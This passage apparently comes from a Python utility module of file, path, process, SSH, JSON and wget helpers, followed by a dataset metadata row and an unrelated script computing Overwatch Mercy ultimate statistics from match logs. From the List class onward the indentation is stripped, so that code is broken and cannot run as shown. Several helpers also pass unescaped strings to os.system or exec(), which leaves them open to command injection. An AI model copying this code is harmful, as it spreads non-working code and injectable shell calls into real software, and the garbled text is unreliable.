        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # automatically add unknown hosts
        ssh.connect(host, username=username, password=password)
        # Bug fix: the original ignored `command` and always ran "uptime".
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(command)
        if (ssh_stderr.read() != b'') and not safe:
            raise IOError("ssh_stderr = " + str(ssh_stderr))
        ssh.close()
        return str(ssh_stdout.read(), 'utf8')
    @classmethod
    def get_avg_load_lin(cls, host, username, password, safe=False):
        """Return the three load averages reported by `uptime` on a Linux host."""
        # "uprime" typo fixed: now that get_output really sends the command,
        # it has to be spelled correctly.
        output = cls.get_output(host=host, username=username, password=password, command="uptime", safe=safe)
        output = Str.substring(output, before="load average: ", after=newline)
        output = output.split(", ")
        return output
    @classmethod
    def get_uptime_lin(cls, host, username, password, safe=False):
        """Return the uptime string reported by `uptime` on a Linux host."""
        output = cls.get_output(host=host, username=username, password=password, command="uptime", safe=safe)
        output = Str.substring(output, before=" up ", after=", ")
        return output
class Path:
    """Path helpers built on os.path."""
    @staticmethod
    def full(path):
        # Absolute, normalised form of path.
        return os.path.abspath(path)
    @staticmethod
    def commands8():
        # Directory containing this module file.
        return os.path.dirname(os.path.realpath(__file__))
    @staticmethod
    def working():
        # Current working directory.
        return os.getcwd()
    @classmethod
    def extend(cls, *paths):  # paths input strings of path1 pieces, return
        # d string with path1, good for OS
        # `path` is deliberately unbound until the first iteration, so the
        # NameError branch below runs exactly once — for the first piece,
        # which gets platform-specific anchoring.
        for path_ in paths:
            try:
                path = os.path.join(str(path), str(path_))
            except NameError:  # first path1 piece is very important
                if (OS.name == "windows") and path_ == backslash:  # support for smb windows paths like \\ip_or_pc\dir\
                    path = backslash * 2
                elif (OS.name == "windows") and (len(path_) <= 3):
                    # Short first pieces such as "C:" become drive roots.
                    path = os.path.join(path_, os.sep)
                elif OS.name == "windows":
                    path = path_
                elif OS.family == "unix":
                    if path_ == "..":
                        path = path_
                    elif path_ == ".":
                        path = path_
                    elif path_ == "~":
                        path = cls.home()
                    else:
                        # Anything else is anchored at the filesystem root.
                        path = os.path.join(os.sep, path_)
                else:
                    raise FileNotFoundError("path_" + str(path_) + "is not expected")
        return path
    @staticmethod
    def home():  # return path1 of home directory of current user. Not tested in
        # d linux.
        # todo test in lunux!
        if OS.name == "windows":
            path = Console.get_output(r"echo %userprofile%")
            path = path.rstrip(newline2)
        else:
            path = Console.get_output("echo $HOME", split_lines=True)[0]
            path = path.rstrip(newline)
        return path
    @staticmethod
    def set_current(path, quiet=True):  # changes current working directory.
        # d If quiet is disabled, prints directory.
        os.chdir(path)
        if not quiet:
            Print.debug("os.getcwd() # current directory is", os.getcwd())
class Locations:
    """Per-OS default programs, resolved once at import time from OS.name.

    NOTE(review): on an unrecognised OS.name none of the attributes are
    defined and any access raises AttributeError — confirm intended.
    """
    if OS.name == "windows":  # d ...
        texteditor = "notepad"  # d notepad is in every version of Windows, yea?
        py = "py"
        pyw = "pyw"
    elif OS.name == "macos":  # d ...
        texteditor = "open"  # d just open default program for file
        py = "python3"
        pyw = "python3"
    elif OS.name == "linux":  # d ...
        texteditor = "nano"  # d nano is everywhere, I suppose? ]-:
        py = "python3"
        pyw = "python3"
class Dir:
    """Directory helpers: creation, listing, counting and batch rename."""
    @staticmethod
    def create(filename):
        """Create the directory (and parents) if it does not exist yet."""
        if not os.path.exists(filename):
            os.makedirs(filename)
    @staticmethod
    def commands8(): return Path.commands8()  # alias to Path.commands8
    @staticmethod
    def working(): return Path.working()  # alias to Path.working
    @staticmethod
    def list_of_files(path):
        """Return the list of entry names inside path."""
        return os.listdir(path)
    @staticmethod
    def number_of_files(path, quiet=False):
        """Return the number of entries in path, or None when path is missing."""
        try:
            # Bug fix: Dir.contents() never existed; use list_of_files().
            dir_contents = Dir.list_of_files(path)
            if not quiet:
                print(os.path.split(path)[1], "contain", len(dir_contents), "files")
            return len(dir_contents)
        except FileNotFoundError:
            if not quiet:
                print("Path", path, "isn't found")
            return None
    @classmethod
    def batch_rename(cls, directory, input_str, output_str, quiet=False):
        """Rename every entry in directory whose name contains input_str,
        replacing input_str with output_str in the name."""
        # Bug fixes: cls.contain() never existed (now list_of_files), and
        # the old code passed bare file names to File.rename, which only
        # worked when the current working directory happened to be
        # `directory`; join with the directory instead.
        for filename in cls.list_of_files(directory):
            if input_str in filename:
                final_name = filename.replace(input_str, output_str)
                File.rename(os.path.join(directory, filename),
                            os.path.join(directory, final_name))
                if not quiet:
                    print(filename, "renamed to", final_name)
class File:
    """Single-file helpers: create/delete/move/copy/rename, hiding,
    timestamped backups and whole-file read/wipe."""
    @staticmethod
    def create(filename):
        # Create an empty file (and any parent directories) if missing.
        filename = Path.full(filename)
        if os.path.split(filename)[0] != "":
            Dir.create(os.path.split(filename)[0])
        if not os.path.exists(filename):
            with open(filename, 'a'):  # open file and close after
                os.utime(filename, None)  # changes time of file modification
        if not os.path.exists(filename):
            raise FileNotFoundError("error while creating file " + filename +
                                    "try to repair script at " + Path.full(sys.argv[0]))
    @staticmethod
    def delete(path, quiet=False):  # ...
        # Delete a file (directories are refused) and verify it is gone.
        if os.path.isdir(path):
            raise IsADirectoryError(path + " is directory, use Dir.delete to delete")
        try:
            os.remove(path)
        except FileNotFoundError:
            if not quiet:
                print("file", path, "is not exist")
        # NOTE(review): "is deleted" also prints when the file was already
        # absent (the except above falls through) — confirm intended.
        if not quiet:
            print("file", path, "is deleted")
        time.sleep(0.05)  # brief pause before re-checking the filesystem
        if os.path.exists(path):
            raise FileExistsError(path + " is not deleted")
    @staticmethod
    def move(input_file, output_file):  # ...
        shutil.move(input_file, output_file)
    @staticmethod
    def copy(input_file, output_file):  # ...
        # copy2 preserves file metadata.
        shutil.copy2(input_file, output_file)
    @staticmethod
    def rename(input_file, output_file):  # ...
        # Rename is implemented as a move.
        File.move(input_file, output_file)
    @staticmethod
    def hide(filename, quiet=True):  # adding dot to filename and set attribute
        # d FILE_ATTRIBUTE_HIDDEN to file, if running on Windows
        # Returns the new (dot-prefixed) path.
        filename = Path.full(filename)
        if OS.name == "windows":
            win32api.SetFileAttributes(filename, win32con.FILE_ATTRIBUTE_HIDDEN)  # hiding file like windows do
        dotted_file = Path.extend(os.path.split(filename)[0], "." + os.path.split(filename)[1])  # adding dot
        File.rename(filename, dotted_file)
        if not quiet:
            print ("file", filename, "is hidden now")
        return dotted_file
    @classmethod
    def backup(cls, filename, subfolder="bak", hide=True, quiet = False):
        # d move file to subfolder, adds sort of timestamp to filename and hide
        # d file if necessary
        # Copies filename into subfolder as name.<timestamp>.bak; returns
        # the backup path, raising FileNotFoundError when it did not appear.
        filename = Path.full(filename)  # normalize filename
        backupfilename = str(filename) + "." + Time.dotted() + ".bak"  # add dottedtime to backup filename
        backupfilename = os.path.split(backupfilename)  # splitting filename to folder and file
        try:  # if subfolder has no len
            if len(subfolder) < 1:  # if subfolder has zero len
                raise TypeError("subfolder must have non-zero len")
        except TypeError:  # if subfolder has no len
            subfolder = "bak"  # set subfolder to default
            print("len(subfolder) < 1, so subfolder = 'bak'")  # print error
        subfolder = Path.extend(backupfilename[0], subfolder)  # append subfolder name
        Dir.create(subfolder)  # create subfolder
        backupfilename = Path.extend(subfolder, backupfilename[1])  # backup file name full path1
        shutil.copy2(filename, backupfilename)  # finally backup file
        if hide:
            backupfilename = cls.hide(backupfilename)  # hiding file
        if not os.path.isfile(backupfilename):  # if file is not created
            raise FileNotFoundError(backupfilename + " isn't created while backup")
        if not quiet:  # if finction is not shutted up
            print("backup of file", filename, "created as", backupfilename)  # all is ok, print that
        return backupfilename
    @staticmethod
    def wipe(path):  # clean content of file
        # Truncate the file to zero length.
        file = open(path, 'w')
        file.close()
    @staticmethod
    def read(path):  # return pipe to file content
        # Returns the whole file content as one string.
        with open(path, "r") as f:
            return f.read()
class Time:
    """Time helpers: timestamps, a dotted datetime string, a Russian
    human-readable time and a console countdown timer."""
    rnd = str(random.randint(1, 100))  # fixed random suffix, chosen once per import
    @classmethod
    def fuck(cls):
        """Debug helper: print a marker containing the per-import suffix."""
        print("fuck it all " + cls.rnd)
    @staticmethod
    def stamp():
        """Return the current UNIX timestamp (float seconds)."""
        return time.time()
    @staticmethod
    def dotted():
        """Return now as 'YYYY.MM.DD_at_HH.MM.SS.microseconds' (zero padded)."""
        dateandtime = Time.get("year") + "." + Time.get("month", 2) + "." + \
                      Time.get("day", 2) + "_at_" + Time.get("hour", 2) + "." + \
                      Time.get("minute", 2) + "." + Time.get("second", 2) + "." + \
                      Time.get("microsecond", 6)
        return dateandtime
    @staticmethod
    def get(size, zfill=0):
        """Return the named attribute of datetime.now() as a zero-padded string.

        Hardening: getattr replaces the original eval of a built string,
        and str.zfill replaces Str.leftpad (identical output for these
        non-negative values).
        """
        return str(getattr(datetime.datetime.now(), size)).zfill(zfill)
    @staticmethod
    def rustime(customtime=None):
        """Return a human-readable Russian date/time string; falls back to
        an ASCII form when the console cannot print cyrillic."""
        if customtime:
            day = datetime.datetime.fromtimestamp(customtime).strftime('%d')
            month = datetime.datetime.fromtimestamp(customtime).strftime('%m')
            year = datetime.datetime.fromtimestamp(customtime).strftime('%Y')
            hour = datetime.datetime.fromtimestamp(customtime).strftime('%H')
            minute = datetime.datetime.fromtimestamp(customtime).strftime('%M')
            second = datetime.datetime.fromtimestamp(customtime).strftime('%S')
        else:
            gettime = datetime.datetime.now()
            day = gettime.strftime("%d")
            month = gettime.strftime('%m')
            year = gettime.strftime('%Y')
            hour = gettime.strftime('%H')
            minute = gettime.strftime('%M')
            second = gettime.strftime('%S')
        rustime = str(day) + " числа " + str(month) + " месяца " + str(year) + " года в " \
                  + str(hour) + ":" + str(minute) + ":" + str(second)
        if not OS.cyrrilic_support:
            rustime = str(day) + "." + str(month) + "." + str(year) + "y at " \
                      + str(hour) + ":" + str(minute) + ":" + str(second)
        return rustime
    @staticmethod
    def timer(seconds, check_per_sec=10):
        """Console countdown: rewrite the remaining whole seconds until
        `seconds` have elapsed, polling check_per_sec times per second."""
        Countdown = get_Bench()
        Countdown.start()
        secs_second_var = int(seconds)
        while Countdown.get() < seconds:
            time.sleep(1/check_per_sec)
            secs_left_int = int(seconds - Countdown.get())
            if secs_left_int != secs_second_var:
                secs_second_var = secs_left_int
                Print.rewrite("Timer for " + str(seconds) + " seconds. " + str(secs_left_int) + " left")
        Print.rewrite("")
class Json():
    """Load/save JSON files with write-back verification, via the File helpers."""
    @classmethod
    def check(cls, filename):
        """Return True when filename parses as JSON, else print a notice
        and return False."""
        try:
            cls.load(filename)
            return True
        except Exception:  # any failure means invalid JSON (was a bare except)
            print("JSON is bad")
            return False
    @classmethod
    def save(cls, filename, jsonstring, quiet=False, debug=False):
        """Serialise jsonstring to filename and verify it reads back equal.

        Raises IOError, chained to the original error, on any failure.
        """
        try:
            File.create(filename)
            settingsJsonTextIO = open(filename, "w")
            json.dump(jsonstring, settingsJsonTextIO)
            settingsJsonTextIO.close()
            if not quiet:
                print("JSON succesfull saved")
            if debug:
                print("sys.argv[0] =", sys.argv[0])
                print(jsonstring)
        except Exception as err:
            # Narrowed from a bare except; chain the cause for debugging.
            raise IOError("error while saving JSON, try to repair script at path1 " +
                          Path.full(sys.argv[0])) from err
        # Round-trip verification: what was written must read back equal.
        json_test_string = cls.load(filename, quiet=True)
        if jsonstring != json_test_string:
            Print.debug("jsonstring_to_save", jsonstring, "json_test_string_from_file", json_test_string)
            raise IOError("error while saving JSON, try to repair script at path1 " +
                          Path.full(sys.argv[0]))
    @classmethod
    def load(cls, filename, quiet=False, debug=False):
        """Read filename as JSON; a missing file is first created as {}.

        Raises IOError, chained to the original error, on any failure.
        """
        try:
            if not os.path.isfile(filename):
                File.create(filename)
                cleanjson = {}
                cls.save(filename, cleanjson)
            settingsJsonTextIO = open(filename)
            jsonStringInMemory = json.load(settingsJsonTextIO)
            settingsJsonTextIO.close()
            if not quiet:
                print("JSON succesfull loaded")
            if debug:
                print(jsonStringInMemory)
            return jsonStringInMemory
        except Exception as err:
            # Narrowed from a bare except; chain the cause for debugging.
            raise IOError("error while loading JSON, try to repair script at path1 " +
                          Path.full(sys.argv[0])) from err
class List:
@staticmethod
def flatterize(input_list):
if not ((isinstance(input_list,list)) or (isinstance(input_list,tuple))):
raise TypeError("object of type '"+str(type(input_list))+"' can't be flatterized")
output_list = copy.deepcopy(list(input_list))
cnt = 0
for object in output_list:
if not isinstance(object, (str,int)):
output_list.pop(cnt)
for item in reversed(object):
output_list.insert(cnt, item)
cnt+=1
return output_list
@staticmethod
def split_every(list_input, count):
count = int(count)
output_lists = [list_input[x:x+count] for x in range(0, len(list_input), count)] # https://stackoverflow.com/questions/9671224/split-a-python-list-into-other-sublists-i-e-smaller-lists
return output_lists # todo отдебажить пограничные моменты
class Process():
@staticmethod
def kill(process):
if OS.name == "windows":
command_ = "taskkill /f /im " + str(process) + ".exe"
try:
int(process)
command_ = "taskkill /f /pid " + str(process)
except:
pass
elif OS.name == "macos":
command_ = "killall " + str(process)
try:
int(process)
command_ = "kill " + str(process)
except:
pass
else:
Gui.warning("OS " + str(OS.name) + " not supported")
os.system(command_)
@staticmethod
def start(*arguments, new_window=False, debug=False, pureshell=False):
arguments = List.flatterize(arguments)
if debug:
Print.debug("Process.start arguments", arguments)
if new_window or pureshell:
for argument_ in arguments:
if " " in argument_ and argument_[:1] != "-":
if OS.name == "windows":
argument_ = Str.to_quotes(argument_)
else:
argument_ = Str.to_quotes_2(argument_)
try:
command = command + " " + argument_
except NameError:
if new_window:
if OS.name == "windows":
command = 'start "" ' + argument_
elif OS.name == "macos":
Gui.warning("macOS doesn't support creating new window now")
#command = "" +
else:
command = argument_
os.system(command)
else:
if OS.name == "windows":
commands = []
for argument_ in arguments:
commands.append(str(argument_))
subprocess.call(commands)
elif OS.name == "macos":
commands = ""
for argument_ in arguments:
commands += str(argument_) + " "
# print(commands)
os.system(commands)
class Dict:
@staticmethod
def iterable(dict):
return dict.items()
class Codegen:
debug = False
@classmethod
def start(cls, file_path):
File.wipe(file_path)
cls.file = open(file_path, "wb")
@classmethod
def add_line(cls, code):
cls.file.write(code.encode('utf8'))
if cls.debug:
print(code)
@classmethod
def end(cls, quiet=False):
cls.file.close()
shebang = "#! python3" + newline + \
"# -*- coding: utf-8 -*-" + newline
def plog(logfile, logstring="some shit happened", customtime=None, quiet=False, backup=True):
if not quiet:
print(logstring)
File.create(logfile)
if backup:
File.backup(logfile, quiet=True)
file = open(logfile, "a")
if customtime:
file.write(Time.rustime(customtime) + " " + str(logstring) + newline)
else:
file.write(Time.rustime() + " " + str(logstring) + newline)
file.close()
class Network:
@staticmethod
def getDomainOfUrl(url):
url_output = Str.substring(url, "://", "/")
if url_output == "":
url_output = Str.substring(url, "://")
return url_output
@classmethod
def ping(Network, domain ="127.0.0.1", count=1, quiet=False, logfile=None, timeout=10000):
# с таким эксепшном можно сделать куда проще это всё
domain = Network.getDomainOfUrl(domain)
if not quiet:
colorama.reinit()
Print.rewrite("Pinging", domain, count, "times...")
up_message = domain + " is up!"
down_message = domain + " is down."
try:
if OS.name == "windows":
count_arg = "n"
timeout_arg = "w"
if OS.name in ["macos", "linux"]:
count_arg = "c"
timeout_arg = "W"
if OS.name == "linux":
timeout = int(timeout/1000)
command = "ping " + domain + " -" + count_arg + " " + str(count) + \
" -" + timeout_arg + " " + str(timeout)
ping_output = Console.get_output(command)
except KeyboardInterrupt:
sys.exit()
except: # any exception is not good ping
ping_output = ""
if ("TTL" in ping_output) or ("ttl" in ping_output):
up = True
else:
up = False
if logfile:
if up:
plog(logfile, domain + " is up!", quiet=True)
cprint(up_message, "white", "on_green")
else:
plog(logfile, down_message, quiet=True)
cprint(down_message, "white", "on_red")
elif not quiet:
Print.rewrite("")
if up:
cprint(up_message, "white", "on_green")
else:
cprint(down_message, "white", "on_red")
colorama.deinit()
return up
class Fix:
def winRepair_UnicodeEncodeError(quiet=""):
if quiet:
quiet = " > null"
os.system("chcp 65001" + quiet)
os.system("set PYTHONIOENCODING = utf - 8")
class Bash:
escapable_chars = [backslash]
@classmethod
def argument_escape(cls, argument):
for char in cls.escapable_chars:
argument = argument.replace(char, backslash+char)
return Str.to_quotes(argument)
class macOS:
class osascript:
@staticmethod
def quotes_escape(string):
quote_1 = '"'
#quote_2 = "'"
# if there any already escaped symbols:
string = string.replace(backslash, backslash*3) # if there any other escaped symbols except quotes
string = string.replace(backslash*3+quote_1, backslash*2+quote_1) # removing one backslash, because it will added furthurer
#string = string.replace(backslash*3+quote_2, backslash*2+quote_2)
# usual quotes escape
escaped_1 = backslash + quote_1
#escaped_2 = backslash + quote_2
string = string.replace(quote_1,escaped_1)
#string = string.replace(quote_2, escaped_2)
return string
@classmethod
def notification(cls, message, title="python3", subtitle=None, sound=None, list_of_sounds=False):
# https://apple.stackexchange.com/questions/57412/how-can-i-trigger-a-notification-center-notification-from-an-applescript-or-shel# - just applescript
# better realizations:
# advanced commandline tool - https://github.com/vjeantet/alerter
# simpler commandline tool - https://github.com/vjeantet/alerter
# commands = "display notification \"message\" with title \"title\" subtitle \"subtitle\" sound name \"Sosumi\""
commands = "display notification " + Str.to_quotes(cls.osascript.quotes_escape(message))
if title or subtitle:
commands += " with "
if title:
commands += "title " + Str.to_quotes(cls.osascript.quotes_escape(title)) + " "
if subtitle:
commands += "subtitle " + Str.to_quotes(cls.osascript.quotes_escape(subtitle)) + " "
if sound:
commands += " sound name " + Str.to_quotes(cls.osascript.quotes_escape(sound))
commands = cls.osascript.quotes_escape(commands) # escaping quotes:
commands = Str.to_quotes(commands) # applescript to quotes
Process.start("osascript", "-e", commands) # f start(*arguments, new_window=False, debug=False, pureshell=False):
if list_of_sounds:
Print.debug("global sounds", Dir.list_of_files(Path.extend("System", "Library", "Sounds")), "local sounds", Dir.list_of_files(Path.extend("~", "Library", "Sounds")))
class Gui:
def warning(message):
try:
try:
sys.ps1
sys.ps2
interactive_mode = True
except:
interactive_mode = False
Print.debug("interactive_mode", interactive_mode)
try:
not_dot_py = sys.argv[0][-3] != ".py" # todo check logic
except:
not_dot_py = True
if (not_dot_py or (sys.argv[0] != "")) and (not interactive_mode):
Print.debug("sys.argv", sys.argv)
Print.debug("Something wrong with sys.argv. Tkinter doesn't like it.")
input()
except IndexError:
Print.debug("sys.argv", sys.argv)
raise RuntimeError ("Something wrong with sys.argv. Tkinter doesn't like it.")
if OS.name == 'macos':
macOS.notification(message)
if OS.name != "macos" and OS.python_implementation != "pypy":
Internal.mine_import("pyautogui")
pyautogui.alert(message)
else:
Print.debug("PyPy doesn't support pyautogui, so warning is here:", warning)
input("Press Enter to continue")
class Tkinter():
@staticmethod
def color(red, green, blue): # return string of color matching for use in
# d Tkinter
return str('#%02x%02x%02x' % (red, green, blue))
class Windows:
@staticmethod
def lock(): # locking screen, work only on Windows < 10
if OS.windows_version and (OS.windows_version != 10):
ctypes.windll.LockWorkStation() # todo fix Windows 10
else:
raise OSError("Locking work only on Windows < 10")
class Random:
@staticmethod
def integer(min, max): # return random integer
return random.randrange(min, max+1)
@staticmethod
def float(min, max): # return random floating number
return random.uniform(min, max)
@staticmethod
def string(length):
import string
return ''.join(random.choices(string.ascii_uppercase + string.ascii_lowercase + string.digits, k=length))
class Wget:
@staticmethod
def download(url, output, quiet=False): # just wrapper for commandline wget
arguments = '--header="Accept: text/html" ' + \
'--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) ' + \
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3167.0 Safari/537.36"'
if quiet:
command = "wget '" + url + "' -O " + output + " " + arguments
return Console.get_output(command)
else:
url = url.replace("&", backslash + "&")
Process.start("wget", url, "-O", output, arguments, pureshell=True)
# Another way to fix blocks by creating ~/.wgetrc file https://stackoverflow.com/a/34166756
class Int:
@staticmethod
def from_to(start, end, to_str=False): # return list_ of integers, if argument
# g "to_str" activated, return list_ of strings with equal length
roots = range(start, end + 1)
if to_str:
output = []
max_len = max(len(str(start)), len(str(end)))
for root in roots:
if root < 0:
output.append("-" + Str.leftpad(-root, max_len-1, 0))
else:
output.append(Str.leftpad(root, max_len, 0))
return output
else:
return roots
class CLI():
@staticmethod
def get_y_n(question=""):
while True:
inputtt = input(str(question) + " (y/n)?")
inputtt = inputtt.strip(" ")
if inputtt == "y":
return True
if inputtt == "n":
return False
wait_update_pos = 0
@classmethod
def wait_update(CLI, quiet=False):
if CLI.wait_update_pos == 0:
stick = "|"
elif CLI.wait_update_pos == 1:
stick = "/"
elif CLI.wait_update_pos == 2:
stick = "-"
elif CLI.wait_update_pos == 3:
stick = "\ "[:1]
elif CLI.wait_update_pos == 4:
stick = "|"
elif CLI.wait_update_pos == 5:
stick = "/"
elif CLI.wait_update_pos == 6:
stick = "-"
elif CLI.wait_update_pos == 7:
stick = "\ "[:1]
CLI.wait_update_pos = -1
CLI.wait_update_pos += 1
if not quiet:
Print.rewrite(stick)
else:
return stick
@staticmethod
def progressbar(count, of):
Console.width()
class Repl:
@staticmethod
def loop(safe=False): # mine shitty implementation of REPL
def main(): # dir ignore
while True:
try:
command = input(">>")
exec (command)
exec("print(" + Str.substring(command, before = '', after=' ') + ")", globals())
except KeyboardInterrupt:
break
except SyntaxError as err:
print(err)
if safe:
try:
main()
except:
pass
else:
main()
colorama.reinit()
LoadTimeBenchMark = get_Bench()
LoadTimeBenchMark.time_start = start_bench_no_bench
LoadTimeBenchMark.prefix = "commands8 v" + __version__ + " loaded in"
LoadTimeBenchMark.end()
#if __name__ == "__main__":
# Internal.dir_c()
# Repl.loop()
| egigoka/test | acl_edit/commands8.py | commands8.py | py | 50,047 | python | en | code | 2 | github-code | 6 | [
{
"api_name": "datetime.datetime.now",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "date... |
34181662048 | import json
import time
from collections import defaultdict
current = 2370
maxGame = 2426
import datetime
import matplotlib.pyplot as plt
MERCY_ULT_TIME = 20
from pathlib import Path
ult_timers = {
'doomfist':4,
'genji':6,
'mccree': 6,
'pharah': 3,
'reaper': 3,
'soldier':6,
'mercy':6,
'sombra':6,
'tracer':3,
'bastion':8,
'hanzo':5,
'junkrat':10,
'mei':5,
'torbjorn': 12,
'widowmaker': 15.5,
'orisa': 5,
'reinhardt': 3,
'roadhog': 6,
'winston': 10,
'zarya': 4,
'ana': 8,
'lucio': 6.25,
'mercy':20,
'moira':8
}
def update_mercy_lifespan(player,seconds,mercy_list):
mercy_list[player][0] += seconds
mercy_list[player][1] += 1
#means the player died.
if seconds < 20:
mercy_list[player][2] += 1
def time_converter(start, current_time):
return str(datetime.timedelta(seconds=(current_time-start)))
def calculate_ults_in_teamfight(ult_time_dictionary,first_kill,last_kill):
current_ults = defaultdict(list)
future_ults = defaultdict(list)
for color,ult_list in ult_time_dictionary.items():
current_list = []
new_list = []
for ult in ult_list:
character = ult[0]
time = ult[1]
advantage = ult[2]
# if ult happened more than 12 seconds before, it doesn't count as part of the teamfight.
if first_kill - time > 12:
continue
elif time - last_kill > 0:
advantage = 0
future_ults[color].append((character,time,advantage))
else:
current_ults[color].append((character,time,advantage))
return current_ults, future_ults
mercy_ult_win_ratio = [0,0]
kills = 0
ults = 0
#mercy lifespan contains three values. The first number is seconds alive, while the second number is times used, and third is times interrupted.
mercy_lifespan = defaultdict(list)
mercy_killers = defaultdict(int)
ults_used = defaultdict(int)
players_by_playtime = {}
mercy_ult_by_advantage = defaultdict(int)
time_to_charge_ult = defaultdict(dict)
#comp at team fight.
team_fight_comp = {}
while current < maxGame:
fights = 0
fight_happening = False
game_number = 1
round_number = 1
blue_name = ""
red_name = ""
current_character_by_player = defaultdict(int)
while game_number < 6:
fight_happening = False
current_ults = 0
print(game_number, round_number)
players = defaultdict(int)
players_by_id = {'red':defaultdict(int),
'blue':defaultdict(int)}
file_name = "game_data/"
file_name += str(current) + "_" + str(game_number) + "_" + str(round_number) + ".json"
f = Path(file_name)
#game finished
if not f.is_file():
game_number += 1
round_number = 1
continue
with open(file_name,'r') as f:
datastore = json.load(f)
datastore = json.loads(datastore)
blue_playtime = defaultdict(int)
red_playtime = defaultdict(int)
start = 0
end = 0
#initializing players
for key in datastore.keys():
if key != 'events':
if key == 'blue':
blue_name = datastore[key]
if key == 'red':
red_name = datastore[key]
if key == 'bluenames':
for index, player in enumerate(datastore[key]):
if player == "Nus":
player = "nus"
players_by_id['blue'][index+1] = player
if player not in players_by_playtime:
players_by_playtime[player] = defaultdict(int)
if key == 'rednames':
for index, player in enumerate(datastore[key]):
if player == "Nus":
player = "nus"
players_by_id['red'][index+1] = player
if player not in players_by_playtime:
players_by_playtime[player] = defaultdict(int)
current_character_by_player = defaultdict(int)
'''
Keep track of mercies ulting. If mercy ult > 20 seconds or death,
set a negative number to end ult.
'''
mercy_ult_start = defaultdict(int)
mercy_ult_start['red'] = -1000
mercy_ult_start['blue'] = -1000
opposite_color = {"blue":"red", "red":"blue"}
last_ult_time = defaultdict(int)
ults_used_by_color = defaultdict(list)
player_advantage_in_ult = defaultdict(list)
last_kill = 0
first_kill = 0
fight_kills = 0
kills_by_color = {'red': 0, 'blue': 0}
mercy = {}
for event in datastore['events']:
time = event[0]
standard_time = str(datetime.timedelta(seconds=(time-start)))
if(event[1] == 'PAUSE' or event[1] == 'UNPAUSE'):
continue
if fight_happening:
#if fight has terminated
if time - last_kill > 14 or event[1] == 'END':
fight_happening = False
#print("fight end is at " + str(datetime.timedelta(seconds=(last_kill-start))))
current_ults, future_ults = calculate_ults_in_teamfight(player_advantage_in_ult,first_kill, last_kill)
ult_first = None
mercy_color = None
both_mercies = False
for color in current_ults:
for ult in current_ults[color]:
character = ult[0]
ult_time = ult[1]
advantage = ult[2]
if character == 'mercy':
if not ult_first:
ult_first = (ult_time,advantage)
else:
if ult_time < ult_first[0]:
ult_first = (ult_time,advantage)
if mercy_color == None:
mercy_color = color
else:
if mercy_color != color:
both_mercies = True
mercy_ult_time = str(datetime.timedelta(seconds=(ult_time-start)))
if ult_first:
mercy_ult_by_advantage[ult_first[1]] += 1
player_advantage_in_ult = future_ults
winning_color = max(kills_by_color, key=kills_by_color.get)
if max(kills_by_color.values()) != min(kills_by_color.values()):
if (not both_mercies) and mercy_color != None:
print("There is only one mercy")
mercy_ult_win_ratio[1] += 1
if winning_color == mercy_color:
print("One mercy won!")
mercy_ult_win_ratio[0] += 1
kills_by_color = dict.fromkeys(kills_by_color, 0)
#weird glitch involving player switches on Dragons vs Mayhem
if time >= 11687 and time < 11699 and current == 2412:
continue
#Check if mercy lived through ult
for color in mercy_ult_start:
if mercy_ult_start[color] > 0 and time - mercy_ult_start[color] > 20:
mercy_player = mercy[color]
last_ult_time[mercy_player] = mercy_ult_start[color] + 20
update_mercy_lifespan(mercy_player,20, mercy_lifespan)
mercy_ult_start[color] = -1000
if event[1] == 'END':
end = time
elif event[1] == 'MATCH':
start = time
else:
color = event[2].lower()
opposing_color = opposite_color[color]
player_id = event[3]
first_character = event[4]
player = players_by_id[color][player_id]
if event[1] == 'SWITCH':
second_character = event[5]
if player in current_character_by_player:
old_time,old_character = current_character_by_player[player]
play_time = time - old_time
players_by_playtime[player][old_character] += play_time
#since player switched, last ult time is now inaccurate.
if player in last_ult_time:
del last_ult_time[player]
if second_character == "mercy":
if player not in mercy_lifespan:
mercy_lifespan[player] = [0,0,0]
mercy[color] = player
current_character_by_player[player] = (time, second_character)
elif event[1] == "ULT_USE":
ults_used_by_color[color] += [first_character]
ults_used[player] += 1
kills_differential = kills_by_color[color] - kills_by_color[opposing_color]
last_ult_time[player] = time
if current_character_by_player[player][1] == "mercy":
#print("{2} Mercy ulted at {0} with {1} advantage".format(standard_time,kills_differential,color))
#print(kills_by_color)
player_advantage_in_ult[color].append((first_character,time,kills_differential))
mercy_ult_by_advantage[kills_differential] += 1
mercy_ult_start[color] = time
elif event[1] == "KILL":
kills_by_color[color] += 1
last_kill = time
#the fight has started.
if not fight_happening:
first_kill = time
fights += 1
fight_happening = True
kills += 1
enemy_id = event[5]
dead_character = event[6]
killed_player = players_by_id[opposing_color][enemy_id]
if dead_character == "mercy":
#mercy died mid-ult
if mercy_ult_start[opposing_color] > 0:
last_ult_time[player] = time
mercy_killers[first_character] += 1
ult_time = time - mercy_ult_start[opposing_color]
update_mercy_lifespan(killed_player,ult_time, mercy_lifespan)
#mark ult as terminated
mercy_ult_start[opposing_color] = -1000
elif event[1] == "REVIVE":
continue
elif event[1] == "ULT_GAIN":
if first_character not in time_to_charge_ult[player]:
time_to_charge_ult[player][first_character] = []
initial_time, dummy = current_character_by_player[player]
if player in last_ult_time:
initial_time = last_ult_time[player]
if first_character == "mercy":
print ("Ult gained for {0} mercy at".format(color),time_converter(start,initial_time), time_converter(start,time))
time_to_charge_ult[player][first_character].append(time - initial_time)
last_ult_time[player] = time
for player in current_character_by_player:
old_time,old_character = current_character_by_player[player]
play_time = end - old_time
players_by_playtime[player][old_character] += play_time
#by playtime
'''
for player in players_by_playtime:
for character in players_by_playtime[player]:
playtime = players_by_playtime[player][character]
print("{0} has been played by {1} for {2} seconds".format(character,player,playtime))
'''
print("fights are {0}".format(fights))
print(str(datetime.timedelta(seconds=(end-start))))
print(mercy_ult_win_ratio)
round_number += 1
current += 1
#calculate average lifespan of mercies
print("Total fights is {0}".format(fights))
print("Total kills is {0}".format(kills))
total_mercy_ults = 0
total_mercy_deaths = 0
mercy_death_graph = {}
#gathering data on average mercy lifespan in valkyrie
for player in mercy_lifespan:
lifetimes, ult_times,deaths = mercy_lifespan[player]
total_mercy_ults += ult_times
total_mercy_deaths += deaths
if ult_times > 0:
